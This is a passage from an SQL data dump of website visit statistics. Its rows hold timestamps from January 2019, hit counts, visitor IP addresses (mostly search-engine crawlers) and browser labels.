66.241','other'),(378867,1548669755,1,1,0,0,'91.196.177.46','firefox'),(378868,1548669810,1,1,0,0,'91.196.178.79','firefox'),(378869,1548669907,1,1,0,0,'66.249.69.124','chrome'),(378870,1548670428,1,1,0,0,'180.76.15.19','other'),(378871,1548670494,3,3,0,0,'216.244.66.241','other'),(378872,1548670603,2,2,0,0,'95.215.223.210','chrome'),(378873,1548670961,1,1,0,0,'46.229.168.139','other'),(378874,1548671111,1,1,0,0,'207.46.13.38','other'),(378875,1548671133,1,1,0,0,'106.120.173.71','other'),(378876,1548671352,1,1,0,0,'66.249.69.126','chrome'),(378877,1548671355,1,1,0,0,'54.36.149.81','other'),(378878,1548671419,1,1,0,0,'54.36.148.122','other'),(378879,1548672153,1,1,0,0,'46.229.168.143','other'),(378880,1548672162,5,5,0,0,'216.244.66.241','other'),(378881,1548672247,1,1,0,0,'207.46.13.38','other'),(378882,1548672431,1,1,0,0,'66.249.69.126','chrome'),(378883,1548672769,1,1,0,0,'54.36.148.196','other'),(378884,1548672886,1,1,0,0,'66.249.69.124','chrome'),(378885,1548673066,7,7,0,0,'216.244.66.241','other'),(378886,1548673134,1,1,0,0,'178.92.205.152','chrome'),(378887,1548673156,1,1,0,0,'46.229.168.148','other'),(378888,1548673171,1,1,0,0,'54.36.148.198','other'),(378889,1548673301,1,1,0,0,'54.36.148.177','other'),(378890,1548674021,1,1,0,0,'91.211.135.230','chrome'),(378891,1548674138,1,1,0,0,'54.36.148.25','other'),(378892,1548674263,1,1,0,0,'46.229.168.137','other'),(378893,1548674615,1,1,0,0,'8.29.198.25','other'),(378894,1548674636,1,1,0,0,'54.36.148.124','other'),(378895,1548674674,1,1,0,0,'54.36.148.194','other'),(378896,1548674725,1,1,0,0,'46.229.168.143','other'),(378897,1548674789,1,1,0,0,'54.36.149.102','other'),(378898,1548674901,3,3,0,0,'216.244.66.241','other'),(378899,1548675186,1,1,0,0,'207.46.13.38','other'),(378900,1548675225,1,1,0,0,'95.134.189.10','chrome'),(378901,1548675250,1,1,0,0,'46.229.168.142','other'),(378902,1548675340,1,1,0,0,'5.196.80.103','firefox'),(378903,1548675403,1,1,0,0,'54.36.149.86','other'),(378904,1548675554,1,1,0,0,'46.229.168.135','other'),(378905,1548675771,1,1,0,0,'54.36.148.225','other'),(378906,1548675945,5,5,0,0,'216.244.66.241','other'),(378907,1548676192,1,1,0,0,'46.229.168.153','other'),(378908,1548676250,1,1,0,0,'46.229.168.140','other'),(378909,1548676673,1,1,0,0,'8.29.198.27','other'),(378910,1548676675,1,1,0,0,'37.145.187.107','msie'),(378911,1548676731,1,1,0,0,'47.244.129.171','msie'),(378912,1548677022,1,1,0,0,'66.249.69.124','chrome'),(378913,1548677265,1,1,0,0,'46.229.168.134','other'),(378914,1548677636,8,8,0,0,'216.244.66.241','other'),(378915,1548678032,1,1,0,0,'37.55.226.179','chrome'),(378916,1548678164,1,1,0,0,'66.249.69.72','chrome'),(378917,1548678581,5,5,0,0,'216.244.66.241','other'),(378918,1548678739,1,1,0,0,'54.36.149.43','other'),(378919,1548678886,1,1,0,0,'66.249.69.122','chrome'),(378920,1548679242,1,1,0,0,'54.36.148.120','other'),(378921,1548679254,1,1,0,0,'54.36.148.253','other'),(378922,1548679582,1,1,0,0,'46.229.168.143','other'),(378923,1548679893,1,1,0,0,'46.229.168.148','other'),(378924,1548680344,1,1,0,0,'66.249.69.74','chrome'),(378925,1548680364,10,10,0,0,'216.244.66.241','other'),(378926,1548680590,1,1,0,0,'37.53.123.48','chrome'),(378927,1548680709,1,1,0,0,'66.249.69.124','chrome'),(378928,1548681030,1,1,0,0,'46.229.168.150','other'),(378929,1548681077,2,2,0,0,'91.196.178.79','firefox'),(378930,1548681249,1,1,0,0,'130.180.216.127','chrome'),(378931,1548681266,5,5,0,0,'216.244.66.241','other'),(378932,1548681327,1,1,0,0,'54.36.148.98','other'),(378933,1548681352,1,1,0,0,'54.36.149.32','other'),(378934,1548681849,1,1,0,0,'54.36.148.57','other'),(378935,1548681972,1,1,0,0,'54.36.148.253','other'),(378936,1548682055,1,1,0,0,'54.36.148.130','other'),(378937,1548682064,1,1,0,0,'54.36.148.223','other'),(378938,1548682332,2,2,0,0,'216.244.66.241','other'),(378939,1548682387,1,1,0,0,'66.249.69.122','chrome'),(378940,1548683130,1,1,0,0,'46.229.168.144','other'),(378941,1548683902,6,6,0,0,'216.244.66.241','other'),(378942,1548683942,1,1,0,0,'66.249.69.74','chrome'),(378943,1548683985,1,1,0,0,'157.55.39.79','other'),(378944,1548684100,1,1,0,0,'66.249.69.72','chrome'),(378945,1548684170,1,1,0,0,'52.53.201.78','chrome'),(378946,1548684217,1,1,0,0,'66.249.69.124','chrome'),(378947,1548684640,1,1,0,0,'91.196.178.136','firefox'),(378948,1548684803,1,1,0,0,'157.55.39.166','other'),(378949,1548685465,1,1,0,0,'8.29.198.25','other'),(378950,1548685570,1,1,0,0,'54.36.149.30','other'),(378951,1548686176,8,8,0,0,'216.244.66.241','other'),(378952,1548686491,1,1,0,0,'54.36.148.98','other'),(378953,1548686589,1,1,0,0,'207.46.13.141','other'),(378954,1548687137,9,9,0,0,'216.244.66.241','other'),(378955,1548687188,1,1,0,0,'46.229.168.148','other'),(378956,1548687499,1,1,0,0,'8.29.198.27','other'),(378957,1548687753,1,1,0,0,'91.196.178.66','firefox'),(378958,1548688296,1,1,0,0,'54.36.148.201','other'),(378959,1548688538,5,5,0,0,'216.244.66.241','other'),(378960,1548688619,1,1,0,0,'91.196.177.46','firefox'),(378961,1548689409,1,1,0,0,'46.229.168.129','other'),(378962,1548689443,9,9,0,0,'216.244.66.241','other'),(378963,1548689660,1,1,0,0,'66.249.69.122','chrome'),(378964,1548689715,1,1,0,0,'54.36.149.95','other'),(378965,1548690003,1,1,0,0,'54.36.148.147','other'),(378966,1548690527,1,1,0,0,'66.249.69.74','chrome'),(378967,1548691288,5,5,0,0,'216.244.66.241','other'),(378968,1548692264,5,5,0,0,'216.244.66.241','other'),(378969,1548692465,1,1,0,0,'46.211.51.80','chrome'),(378970,1548692645,1,1,0,0,'213.108.41.211','firefox'),(378971,1548692888,1,1,0,0,'54.36.149.34','other'),(378972,1548693228,1,1,0,0,'46.229.168.149','other'),(378973,1548693579,1,1,0,0,'54.36.148.81','other'),(378974,1548693928,1,1,0,0,'54.36.148.146','other'),(378975,1548693955,1,1,0,0,'54.36.148.127','other'),(378976,1548693989,2,2,0,0,'216.244.66.241','other'),(378977,1548694804,1,1,0,0,'46.229.168.144','other'),(378978,1548694860,1,1,0,0,'54.36.149.103','other'),(378979,1548694862,1,1,0,0,'66.249.69.126','chrome'),(378980,1548694943,1,1,0,0,'54.36.148.202','other'),(378981,1548695025,3,3,0,0,'216.244.66.241','other'),(378982,1548695118,1,1,0,0,'54.36.148.41','other'),(378983,1548695536,1,1,0,0,'46.211.131.120','chrome'),(378984,1548695583,1,1,0,0,'91.196.178.49','chrome'),(378985,1548695716,1,1,0,0,'51.15.37.97','chrome'),(378986,1548695906,1,1,0,0,'54.36.149.93','other'),(378987,1548696302,1,1,0,0,'8.29.198.26','other'),(378988,1548696352,1,1,0,0,'46.229.168.136','other'),(378989,1548696377,1,0,1,0,'66.249.69.124',''),(378990,1548696401,1,1,0,0,'91.196.178.16','chrome'),(378991,1548696722,5,5,0,0,'216.244.66.241','other'),(378992,1548696837,1,1,0,0,'157.55.39.79','other'),(378993,1548696935,1,1,0,0,'54.36.149.6','other'),(378994,1548696975,1,1,0,0,'54.36.148.22','other'),(378995,1548697163,1,1,0,0,'66.249.69.126','chrome'),(378996,1548697988,8,8,0,0,'216.244.66.241','other'),(378997,1548698047,2,2,0,0,'66.249.69.72','chrome'),(378998,1548698327,1,1,0,0,'8.29.198.27','other'),(378999,1548698519,1,1,0,0,'13.66.139.0','other'),(379000,1548698768,1,1,0,0,'180.76.15.15','other'),(379001,1548698915,1,1,0,0,'54.36.148.184','other'),(379002,1548699226,1,1,0,0,'87.250.224.65','other'),(379003,1548699237,1,1,0,0,'66.249.69.74','chrome'),(379004,1548699438,2,2,0,0,'216.244.66.241','other'),(379005,1548699467,2,2,0,0,'91.196.178.174','chrome'),(379006,1548699533,1,1,0,0,'66.102.9.62','chrome'),(379007,1548699667,1,1,0,0,'66.249.69.126','chrome'),(379008,1548699924,1,1,0,0,'54.36.149.8','other'),(379009,1548700094,1,1,0,0,'54.36.148.211','other'),(379010,1548700350,1,1,0,0,'54.36.149.54','other'),(379011,1548700363,1,1,0,0,'46.229.168.130','other'),(379012,1548700441,1,1,0,0,'66.249.69.122','chrome'),(379013,1548700494,1,1,0,0,'54.36.148.114','other'),(379014,1548700559,8,8,0,0,'216.244.66.241','other'),(379015,1548700714,1,1,0,0,'66.249.69.124','chrome'),(379016,1548701480,1,1,0,0,'40.77.167.149','other'),(379017,1548701494,3,3,0,0,'216.244.66.241','other'),(379018,1548701589,1,1,0,0,'46.229.168.153','other'),(379019,1548701804,1,1,0,0,'46.219.219.72','other'),(379020,1548701826,1,1,0,0,'51.77.177.194','chrome'),(379021,1548701912,1,1,0,0,'54.36.149.37','other'),(379022,1548702304,1,1,0,0,'54.36.148.237','other'),(379023,1548702475,3,3,0,0,'216.244.66.241','other'),(379024,1548702856,1,1,0,0,'66.249.69.74','chrome'),(379025,1548702919,1,1,0,0,'54.36.149.54','other'),(379026,1548703225,1,1,0,0,'66.249.69.124','chrome'),(379027,1548703383,1,1,0,0,'54.36.148.114','other'),(379028,1548703410,7,7,0,0,'216.244.66.241','other'),(379029,1548703442,1,1,0,0,'180.76.15.156','other'),(379030,1548703444,1,1,0,0,'54.36.148.193','other'),(379031,1548703682,1,1,0,0,'91.196.178.49','chrome'),(379032,1548704301,1,1,0,0,'54.36.149.51','other'),(379033,1548704495,1,1,0,0,'54.36.148.64','other'),(379034,1548704942,2,2,0,0,'46.229.168.129','other'),(379035,1548705543,1,1,0,0,'178.133.126.26','chrome'),(379036,1548705545,1,1,0,0,'157.55.39.94','other'),(379037,1548705644,1,1,0,0,'66.249.69.74','chrome'),(379038,1548705686,1,1,0,0,'54.36.148.229','other'),(379039,1548705810,1,1,0,0,'66.249.69.122','chrome'),(379040,1548705961,1,1,0,0,'66.249.69.126','chrome'),(379041,1548706315,1,1,0,0,'66.249.69.72','chrome'),(379042,1548706803,1,1,0,0,'216.244.66.241','other'),(379043,1548707146,1,1,0,0,'8.29.198.25','other'),(379044,1548707749,1,1,0,0,'40.77.167.61','other'),(379045,1548707774,1,1,0,0,'66.249.69.74','chrome'),(379046,1548708036,1,1,0,0,'66.249.69.126','chrome'),(379047,1548708458,2,2,0,0,'216.244.66.241','other'),(379048,1548708518,1,1,0,0,'66.249.69.124','chrome'),(379049,1548708774,3,3,0,0,'46.211.25.41','chrome'),(379050,1548709153,1,1,0,0,'66.249.69.126','chrome'),(379051,1548709160,1,1,0,0,'8.29.198.27','other'),(379052,1548709348,1,1,0,0,'46.201.82.169','chrome'),(379053,1548710811,1,1,0,0,'66.249.69.122','chrome'),(379054,1548711274,1,1,0,0,'40.77.167.50','other'),(379055,1548712742,1,1,0,0,'40.77.167.50','other'),(379056,1548713226,1,1,0,0,'66.249.69.72','chrome'),(379057,1548714430,1,1,0,0,'46.229.168.130','other'),(379058,1548714697,1,1,0,0,'46.229.168.138','other'),(379059,1548715345,1,1,0,0,'66.249.69.122','chrome'),(379060,1548715392,1,1,0,0,'66.249.69.74','chrome'),(379061,1548716800,1,1,0,0,'66.249.69.126','chrome'),(379062,1548716904,1,1,0,0,'66.249.69.124','chrome'),(379063,1548716940,1,1,0,0,'46.229.168.135','other'),(379064,1548717973,1,1,0,0,'8.29.198.26','other'),(379065,1548718761,1,1,0,0,'207.46.13.86','other'),(379066,1548718763,1,1,0,0,'46.229.168.138','other'),(379067,1548719160,1,1,0,0,'66.249.69.126','chrome'),(379068,1548719351,1,1,0,0,'5.45.207.79','other'),(379069,1548719604,2,2,0,0,'5.45.207.19','other'),(379070,1548719658,1,1,0,0,'46.229.168.139','other'),(379071,1548719990,1,1,0,0,'8.29.198.25','other'),(379072,1548720334,3,3,0,0,'66.249.69.126','chrome'),(379073,1548720344,1,1,0,0,'5.45.207.79','other'),(379074,1548720842,3,3,0,0,'66.249.69.124','chrome'),(379075,1548720907,1,1,0,0,'207.46.13.213','other'),(379076,1548720923,1,1,0,0,'207.46.13.119','other'),(379077,1548721061,1,1,0,0,'66.249.69.74','chrome'),(379078,1548721269,1,1,0,0,'207.46.13.123','other'),(379079,1548722556,1,1,0,0,'66.249.69.124','chrome'),(379080,1548722773,1,1,0,0,'207.46.13.123','other'),(379081,1548723087,3,3,0,0,'66.249.69.74','chrome'),(379082,1548723365,1,1,0,0,'109.70.100.22','other'),(379083,1548723587,1,1,0,0,'66.249.69.122','chrome'),(379084,1548723727,1,1,0,0,'46.229.168.147','other'),(379085,1548723804,1,1,0,0,'46.229.168.134','other'),(379086,1548723936,1,1,0,0,'95.220.52.78','msie'),(379087,1548724694,1,1,0,0,'46.229.168.140','other'),(379088,1548725183,1,1,0,0,'216.244.66.241','other'),(379089,1548726138,1,1,0,0,'207.46.13.215','other'),(379090,1548726218,1,1,0,0,'46.229.168.134','other'),(379091,1548726260,1,1,0,0,'66.249.69.122','chrome'),(379092,1548727552,1,1,0,0,'46.229.168.147','other'),(379093,1548727917,2,2,0,0,'66.249.69.126','chrome'),(379094,1548728804,1,1,0,0,'8.29.198.26','other'),(379095,1548729017,1,1,0,0,'66.249.69.74','chrome'),(379096,1548729828,2,2,0,0,'54.184.69.50','chrome'),(379097,1548730842,1,1,0,0,'8.29.198.25','other'),(379098,1548731382,1,1,0,0,'66.249.69.72','chrome'),(379099,1548731571,1,1,0,0,'66.249.69.74','chrome'),(379100,1548732449,1,1,0,0,'216.244.66.241','other'),(379101,1548733046,1,1,0,0,'207.46.13.148','other'),(379102,1548733213,1,1,0,0,'46.229.168.153','other'),(379103,1548733599,1,1,0,0,'46.229.168.152','other'),(379104,1548733686,1,1,0,0,'46.229.168.151','other'),(379105,1548733694,1,1,0,0,'180.76.15.23','other'),(379106,1548734024,1,1,0,0,'40.77.167.190','other'),(379107,1548735911,2,2,0,0,'66.249.69.74','chrome'),(379108,1548736183,1,1,0,0,'216.244.66.241','other'),(379109,1548736904,1,1,0,0,'46.229.168.139','other'),(379110,1548737455,1,1,0,0,'46.229.168.154','other'),(379111,1548738276,1,1,0,0,'66.249.69.122','chrome'),(379112,1548738339,1,1,0,0,'46.229.168.152','other'),(379113,1548738594,1,1,0,0,'46.229.168.133','other'),(379114,1548739033,1,1,0,0,'66.249.69.74','chrome'),(379115,1548739328,1,1,0,0,'207.46.13.242','other'),(379116,1548739631,1,1,0,0,'8.29.198.27','other'),(379117,1548740751,1,1,0,0,'157.55.39.4','other'),(379118,1548741141,1,1,0,0,'46.229.168.130','other'),(379119,1548741156,1,1,0,0,'13.57.233.99','chrome'),(379120,1548741595,1,1,0,0,'216.244.66.241','other'),(379121,1548741686,1,1,0,0,'8.29.198.25','other'),(379122,1548743034,1,1,0,0,'178.20.55.18','other'),(379123,1548744050,1,1,0,0,'54.36.148.221','other'),(379124,1548744253,1,1,0,0,'40.77.167.81','other'),(379125,1548744617,1,1,0,0,'54.36.148.177','other'),(379126,1548744703,1,1,0,0,'157.55.39.235','other'),(379127,1548744858,1,1,0,0,'216.244.66.241','other'),(379128,1548744972,1,1,0,0,'157.55.39.2','other'),(379129,1548745038,1,1,0,0,'95.133.61.50','firefox'),(379130,1548745119,1,1,0,0,'66.249.69.124','chrome'),(379131,1548745663,1,1,0,0,'40.77.167.181','other'),(379132,1548745688,1,1,0,0,'37.53.123.48','chrome'),(379133,1548745690,1,1,0,0,'54.36.148.219','other'),(379134,1548745933,1,1,0,0,'54.36.149.40','other'),(379135,1548746679,1,1,0,0,'180.76.15.139','other'),(379136,1548746737,1,1,0,0,'91.196.178.66','chrome'),(379137,1548747076,1,1,0,0,'54.36.148.194','other'),(379138,1548747227,1,1,0,0,'40.77.167.37','other'),(379139,1548747363,1,1,0,0,'46.229.168.133','other'),(379140,1548747703,1,1,0,0,'66.249.69.126','chrome'),(379141,1548747862,1,1,0,0,'54.36.148.226','other'),(379142,1548748159,1,1,0,0,'213.108.41.211','chrome'),(379143,1548748887,1,1,0,0,'54.36.149.52','other'),(379144,1548749509,1,1,0,0,'66.249.69.122','chrome'),(379145,1548749572,1,1,0,0,'213.108.41.211','chrome'),(379146,1548749571,1,1,0,0,'213.108.41.211','chrome'),(379147,1548749822,1,1,0,0,'66.249.69.124','chrome'),(379148,1548749854,2,2,0,0,'46.229.168.151','other'),(379149,1548750462,1,1,0,0,'8.29.198.25','other'),(379150,1548750474,1,1,0,0,'188.163.5.31','chrome'),(379151,1548750526,1,1,0,0,'46.229.168.132','other'),(379152,1548750666,1,1,0,0,'40.77.167.37','other'),(379153,1548751036,1,1,0,0,'92.112.234.191','chrome'),(379154,1548751236,1,1,0,0,'94.178.7.64','chrome'),(379155,1548751477,1,1,0,0,'178.95.157.163','chrome'),(379156,1548751796,1,1,0,0,'66.249.69.126','chrome'),(379157,1548751961,1,1,0,0,'54.36.148.250','other'),(379158,1548751969,1,1,0,0,'46.229.168.146','other'),(379159,1548751982,1,1,0,0,'40.77.167.205','other'),(379160,1548752016,1,1,0,0,'46.229.168.137','other'),(379161,1548752081,1,1,0,0,'195.10.210.70','chrome'),(379162,1548752253,1,1,0,0,'54.36.148.76','other'),(379163,1548752310,1,1,0,0,'46.229.168.132','other'),(379164,1548752521,1,1,0,0,'8.29.198.27','other'),(379165,1548752614,1,1,0,0,'66.249.69.122','chrome'),(379166,1548752684,1,1,0,0,'66.249.69.124','chrome'),(379167,1548752867,2,2,0,0,'216.244.66.241','other'),(379168,1548752874,1,1,0,0,'77.111.244.17','chrome'),(379169,1548752937,1,1,0,0,'91.196.178.66','chrome'),(379170,1548753967,1,1,0,0,'37.53.122.134','chrome'),(379171,1548754195,1,1,0,0,'37.9.113.38','other'),(379172,1548754828,1,1,0,0,'46.229.168.133','other'),(379173,1548755082,1,1,0,0,'54.36.149.5','other'),(379174,1548755288,1,1,0,0,'216.244.66.241','other'),(379175,1548755378,1,1,0,0,'54.36.148.50','other'),(379176,1548755454,1,1,0,0,'54.36.148.12','other'),(379177,1548756120,9,9,0,0,'157.55.39.233','other'),(379178,1548756227,6,6,0,0,'157.55.39.4','other'),(379179,1548756249,8,8,0,0,'40.77.167.37','other'),(379180,1548756310,9,9,0,0,'157.55.39.220','other'),(379181,1548756448,1,1,0,0,'54.36.149.54','other'),(379182,1548756478,1,1,0,0,'178.154.171.24','other'),(379183,1548757160,1,1,0,0,'46.229.168.139','other'),(379184,1548757354,1,1,0,0,'54.36.148.101','other'),(379185,1548757531,1,1,0,0,'176.37.152.201','chrome'),(379186,1548757676,1,1,0,0,'54.36.148.133','other'),(379187,1548757768,1,1,0,0,'91.196.178.66','chrome'),(379188,1548758159,1,1,0,0,'54.36.148.233','other'),(379189,1548758210,1,1,0,0,'62.149.16.175','firefox'),(379190,1548758594,1,1,0,0,'157.55.39.170','other'),(379191,1548758640,1,1,0,0,'91.196.178.85','chrome'),(379192,1548758744,1,1,0,0,'54.36.148.75','other'),(379193,1548759319,1,1,0,0,'77.111.244.151','chrome'),(379194,1548759392,1,1,0,0,'178.154.244.65','other'),(379195,1548759423,1,1,0,0,'66.249.69.124','chrome'),(379196,1548759520,1,1,0,0,'54.36.148.104','other'),(379197,1548759572,1,1,0,0,'193.200.212.54','chrome'),(379198,1548759800,1,1,0,0,'91.196.177.46','firefox'),(379199,1548760005,1,1,0,0,'54.36.148.49','other'),(379200,1548760319,1,1,0,0,'66.249.69.74','chrome'),(379201,1548760351,225,225,0,0,'5.9.156.30','other'),(379202,1548760643,1,1,0,0,'46.229.168.132','other'),(379203,1548760680,1,1,0,0,'54.36.148.217','other'),(379204,1548760864,1,1,0,0,'46.229.168.147','other'),(379205,1548761302,1,1,0,0,'8.29.198.26','other'),(379206,1548761439,1,1,0,0,'54.36.149.91','other'),(379207,1548761482,1,1,0,0,'5.58.83.84','chrome'),(379208,1548761883,1,1,0,0,'66.249.69.126','chrome'),(379209,1548761916,1,1,0,0,'46.229.168.154','other'),(379210,1548761998,1,1,0,0,'54.36.149.37','other'),(379211,1548762074,1,1,0,0,'54.36.148.49','other'),(379212,1548762179,1,1,0,0,'141.8.183.23','other'),(379213,1548762364,1,1,0,0,'54.36.149.58','other'),(379214,1548762407,1,1,0,0,'216.244.66.241','other'),(379215,1548762410,1,1,0,0,'66.249.69.122','chrome'),(379216,1548762467,133,133,0,0,'144.76.119.201','other'),(379217,1548762552,1,1,0,0,'54.36.149.20','other'),(379218,1548763098,1,1,0,0,'66.249.69.124','chrome'),(379219,1548763203,1,1,0,0,'66.249.69.72','chrome'),(379220,1548763321,1,1,0,0,'66.249.69.122','chrome'),(379221,1548763356,1,1,0,0,'8.29.198.27','other'),(379222,1548763369,167,167,0,0,'144.76.119.201','other'),(379223,1548763909,1,1,0,0,'60.191.38.77','firefox'),(379224,1548764028,1,1,0,0,'54.36.148.28','other'),(379225,1548764235,1,1,0,0,'54.36.148.62','other'),(379226,1548764272,3,3,0,0,'216.244.66.241','other'),(379227,1548764349,13,13,0,0,'5.9.155.226','other'),(379228,1548764431,1,1,0,0,'46.229.168.139','other'),(379229,1548764490,1,1,0,0,'54.36.149.86','other'),(379230,1548765325,1,1,0,0,'91.196.178.164','chrome'),(379231,1548765370,1,1,0,0,'66.249.69.124','chrome'),(379232,1548765399,1,1,0,0,'54.36.148.93','other'),(379233,1548765408,1,1,0,0,'60.191.38.77','firefox'),(379234,1548765410,1,1,0,0,'46.229.168.147','other'),(379235,1548765564,1,1,0,0,'91.196.177.46','firefox'),(379236,1548765581,1,1,0,0,'91.196.178.90','firefox'),(379237,1548766227,1,1,0,0,'54.36.149.17','other'),(379238,1548766409,1,1,0,0,'54.36.148.216','other'),(379239,1548766527,1,1,0,0,'216.244.66.241','other'),(379240,1548766614,2,2,0,0,'91.196.178.66','chrome'),(379241,1548766759,1,1,0,0,'66.249.69.122','chrome'),(379242,1548767626,1,1,0,0,'93.171.154.159','chrome'),(379243,1548767767,1,1,0,0,'66.249.69.72','chrome'),(379244,1548767799,1,1,0,0,'54.36.148.232','other'),(379245,1548767973,1,1,0,0,'40.77.167.149','other'),(379246,1548768245,1,1,0,0,'54.36.148.34','other'),(379247,1548768362,1,1,0,0,'54.36.148.218','other'),(379248,1548768453,1,1,0,0,'54.36.148.129','other'),(379249,1548768969,1,1,0,0,'54.36.149.59','other'),(379250,1548769089,27,27,0,0,'35.233.41.151','other'),(379251,1548769302,1,1,0,0,'178.92.248.49','chrome'),(379252,1548769434,2,2,0,0,'66.249.69.122','chrome'),(379253,1548769438,1,1,0,0,'94.153.229.229','chrome'),(379254,1548769469,1,1,0,0,'66.249.69.74','chrome'),(379255,1548769700,1,1,0,0,'40.77.167.130','other'),(379256,1548769736,1,1,0,0,'54.36.148.70','other'),(379257,1548769763,1,1,0,0,'54.36.148.80','other'),(379258,1548769988,1,1,0,0,'54.36.149.82','other'),(379259,1548770436,1,1,0,0,'46.229.168.148','other'),(379260,1548770551,1,1,0,0,'207.46.13.180','other'),(379261,1548770682,1,1,0,0,'31.23.227.190','chrome'),(379262,1548770943,1,0,1,0,'14.231.183.175',''),(379263,1548771115,1,1,0,0,'54.36.148.111','other'),(379264,1548771121,1,1,0,0,'178.215.174.102','firefox'),(379265,1548771493,1,1,0,0,'54.36.149.20','other'),(379266,1548771620,1,1,0,0,'66.249.69.74','chrome'),(379267,1548771621,1,1,0,0,'54.36.148.14','other'),(379268,1548772045,1,1,0,0,'94.153.229.229','chrome'),(379269,1548772146,1,1,0,0,'8.29.198.27','other'),(379270,1548772177,1,1,0,0,'54.36.148.160','other'),(379271,1548772321,1,1,0,0,'216.244.66.241','other'),(379272,1548772492,1,1,0,0,'66.249.69.126','chrome'),(379273,1548772844,1,1,0,0,'54.36.149.30','other'),(379274,1548773002,1,1,0,0,'40.77.167.1','other'),(379275,1548773054,1,1,0,0,'66.249.69.122','chrome'),(379276,1548773368,1,1,0,0,'207.46.13.92','other'),(379277,1548773509,1,1,0,0,'46.229.168.130','other'),(379278,1548773725,1,1,0,0,'66.249.69.74','chrome'),(379279,1548774208,1,1,0,0,'8.29.198.25','other'),(379280,1548774255,1,1,0,0,'216.244.66.241','other'),(379281,1548774351,1,1,0,0,'91.196.177.46','firefox'),(379282,1548774408,1,1,0,0,'54.36.148.65','other'),(379283,1548774471,1,1,0,0,'180.76.15.9','other'),(379284,1548774559,1,1,0,0,'66.249.69.122','chrome'),(379285,1548774646,1,1,0,0,'13.66.139.0','other'),(379286,1548774864,1,1,0,0,'46.229.168.149','other'),(379287,1548774930,1,1,0,0,'46.229.168.140','other'),(379288,1548774998,1,1,0,0,'46.229.168.133','other'),(379289,1548775762,1,1,0,0,'66.249.69.122','chrome'),(379290,1548775893,1,1,0,0,'66.249.69.126','chrome'),(379291,1548775986,1,1,0,0,'46.229.168.135','other'),(379292,1548776285,1,1,0,0,'54.36.148.127','other'),(379293,1548776472,1,1,0,0,'180.76.15.9','other'),(379294,1548776646,1,1,0,0,'54.36.148.183','other'),(379295,1548776856,1,1,0,0,'54.36.148.210','other'),(379296,1548777184,1,1,0,0,'54.36.149.61','other'),(379297,1548777192,1,1,0,0,'54.36.149.20','other'),(379298,1548777571,1,1,0,0,'54.36.148.107','other'),(379299,1548777635,1,1,0,0,'54.36.149.94','other'),(379300,1548777965,1,1,0,0,'54.36.148.50','other'),(379301,1548778065,1,1,0,0,'66.249.69.126','chrome'),(379302,1548778573,1,1,0,0,'54.36.148.74','other'),(379303,1548778785,1,1,0,0,'54.36.149.54','other'),(379304,1548778835,1,1,0,0,'178.137.84.6','chrome'),(379305,1548779031,1,1,0,0,'66.249.69.124','chrome'),(379306,1548779162,1,1,0,0,'54.36.148.207','other'),(379307,1548780146,1,1,0,0,'91.196.178.78','firefox'),(379308,1548780360,1,1,0,0,'66.249.69.122','chrome'),(379309,1548780453,1,1,0,0,'54.36.149.61','other'),(379310,1548780479,1,1,0,0,'66.249.69.124','chrome'),(379311,1548780568,1,1,0,0,'54.36.148.46','other'),(379312,1548780669,1,1,0,0,'46.229.168.150','other'),(379313,1548781114,1,1,0,0,'54.36.148.42','other'),(379314,1548781333,1,1,0,0,'144.76.120.197','other'),(379315,1548781498,1,1,0,0,'46.211.122.199','chrome'),(379316,1548782515,1,1,0,0,'46.201.53.139','chrome'),(379317,1548782663,1,1,0,0,'46.229.168.134','other'),(379318,1548782990,1,1,0,0,'8.29.198.25','other'),(379319,1548783040,1,1,0,0,'216.244.66.241','other'),(379320,1548783173,6,6,0,0,'144.76.81.72','other'),(379321,1548784338,1,1,0,0,'54.36.148.254','other'),(379322,1548784642,1,1,0,0,'54.36.148.226','other'),(379323,1548784763,1,1,0,0,'54.36.148.99','other'),(379324,1548784915,1,1,0,0,'54.36.148.91','other'),(379325,1548785042,1,1,0,0,'8.29.198.27','other'),(379326,1548785148,1,1,0,0,'54.36.148.214','other'),(379327,1548785199,1,1,0,0,'54.36.148.233','other'),(379328,1548785671,1,1,0,0,'46.229.168.148','other'),(379329,1548786357,1,1,0,0,'216.244.66.241','other'),(379330,1548786524,1,1,0,0,'54.36.148.51','other'),(379331,1548787059,1,1,0,0,'46.229.168.153','other'),(379332,1548787812,1,1,0,0,'54.36.148.40','other'),(379333,1548788132,1,1,0,0,'54.36.148.199','other'),(379334,1548788136,1,1,0,0,'54.36.148.14','other'),(379335,1548788275,1,1,0,0,'54.36.148.103','other'),(379336,1548788280,2,2,0,0,'157.55.39.149','other'),(379337,1548789062,1,1,0,0,'54.36.148.186','other'),(379338,1548789462,1,1,0,0,'66.249.69.72','chrome'),(379339,1548789538,1,1,0,0,'66.249.69.126','chrome'),(379340,1548789547,1,1,0,0,'46.229.168.139','other'),(379341,1548790288,1,1,0,0,'54.36.149.99','other'),(379342,1548790356,2,2,0,0,'216.244.66.241','other'),(379343,1548790618,1,1,0,0,'46.229.168.153','other'),(379344,1548790820,1,1,0,0,'54.36.148.235','other'),(379345,1548790974,1,1,0,0,'54.36.148.150','other'),(379346,1548791139,1,1,0,0,'54.36.149.22','other'),(379347,1548791478,1,1,0,0,'54.36.149.45','other'),(379348,1548791534,1,1,0,0,'46.229.168.130','other'),(379349,1548791658,1,1,0,0,'66.249.69.72','chrome'),(379350,1548792567,1,1,0,0,'40.77.167.164','other'),(379351,1548793107,2,2,0,0,'216.244.66.241','other'),(379352,1548793202,1,1,0,0,'91.196.178.166','chrome'),(379353,1548793262,1,1,0,0,'54.36.149.69','other'),(379354,1548793279,1,1,0,0,'54.36.148.49','other'),(379355,1548793841,1,1,0,0,'8.29.198.27','other'),(379356,1548794008,1,1,0,0,'54.36.149.99','other'),(379357,1548794256,1,1,0,0,'46.229.168.144','other'),(379358,1548794322,1,1,0,0,'54.36.148.197','other'),(379359,1548794340,2,2,0,0,'216.244.66.241','other'),(379360,1548794556,1,1,0,0,'54.36.148.146','other'),(379361,1548794897,1,1,0,0,'54.36.149.84','other'),(379362,1548795148,1,1,0,0,'54.36.148.253','other'),(379363,1548795190,1,1,0,0,'54.36.148.133','other'),(379364,1548795641,1,1,0,0,'54.36.149.74','other'),(379365,1548795717,1,1,0,0,'54.36.148.184','other'),(379366,1548795823,1,1,0,0,'54.36.149.45','other'),(379367,1548795847,1,1,0,0,'54.36.148.234','other'),(379368,1548795879,1,1,0,0,'8.29.198.26','other'),(379369,1548795990,1,1,0,0,'46.229.168.136','other'),(379370,1548796365,1,1,0,0,'66.249.69.126','chrome'),(379371,1548797083,1,1,0,0,'46.229.168.136','other'),(379372,1548797290,1,1,0,0,'54.36.148.223','other'),(379373,